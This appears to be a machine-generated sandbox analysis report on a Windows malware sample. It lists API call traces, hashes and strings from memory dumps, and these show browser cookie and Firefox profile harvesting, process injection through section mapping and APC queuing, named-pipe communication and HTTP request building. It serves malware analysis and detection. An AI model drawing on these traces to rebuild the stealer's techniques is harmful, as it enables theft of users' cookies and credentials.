  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
